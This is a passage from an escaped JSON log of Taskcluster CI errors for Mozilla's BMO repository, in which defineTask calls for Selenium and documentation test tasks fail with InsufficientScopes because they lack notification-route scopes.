\\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"T-L-l4M3T_yek3XxgSC21g\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:25.158Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:25.158Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"d8kWcqh7RUWXCSxXeYAuNA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:25.158Z\\\"\\n}\\n  time:     2016-09-29T20:07:25.308Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"T-L-l4M3T_yek3XxgSC21g\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:25.158Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:25.158Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"d8kWcqh7RUWXCSxXeYAuNA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:25.158Z\\\"\\n}\\n  time:     2016-09-29T20:07:25.308Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"T-L-l4M3T_yek3XxgSC21g\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Sel\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"selenium\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"b205285d4b5904a59d53107ec8c423eb1890725d\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/selenium_log\\\"\": {\n                                \"type\": \"file\",\n                                \"path\": \"/selenium.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Selenium Tests\",\n                        \"description\": \"Selenium Tests\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-29T20:07:25.158Z\",\n                    \"deadline\": \"2016-09-30T20:07:25.158Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"d8kWcqh7RUWXCSxXeYAuNA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-30T20:07:25.158Z\"\n                },\n                \"time\": \"2016-09-29T20:07:25.308Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Icjwv4xxQLmHdaNxdoEekw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:25.157Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:25.157Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"d8kWcqh7RUWXCSxXeYAuNA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:25.157Z\\\"\\n}\\n  time:     2016-09-29T20:07:25.313Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Icjwv4xxQLmHdaNxdoEekw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    